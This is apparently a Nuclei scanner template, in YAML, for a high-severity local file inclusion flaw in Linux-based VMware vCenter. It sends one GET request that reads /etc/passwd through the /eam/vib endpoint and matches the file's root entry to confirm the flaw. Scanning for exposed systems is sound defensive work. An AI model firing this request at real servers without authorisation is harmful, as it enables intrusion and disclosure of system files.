25 lines
553 B
YAML
25 lines
553 B
YAML
id: vmware-vcenter-lfi-linux
|
|
|
|
info:
|
|
name: Linux Vmware Vcenter - Local File Inclusion
|
|
author: PR3R00T
|
|
severity: high
|
|
description: Linux appliance based Vmware Vcenter is vulnerable to local file inclusion.
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 1
|
|
tags: vmware,lfi,vcenter,linux
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/eam/vib?id=/etc/passwd"
|
|
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|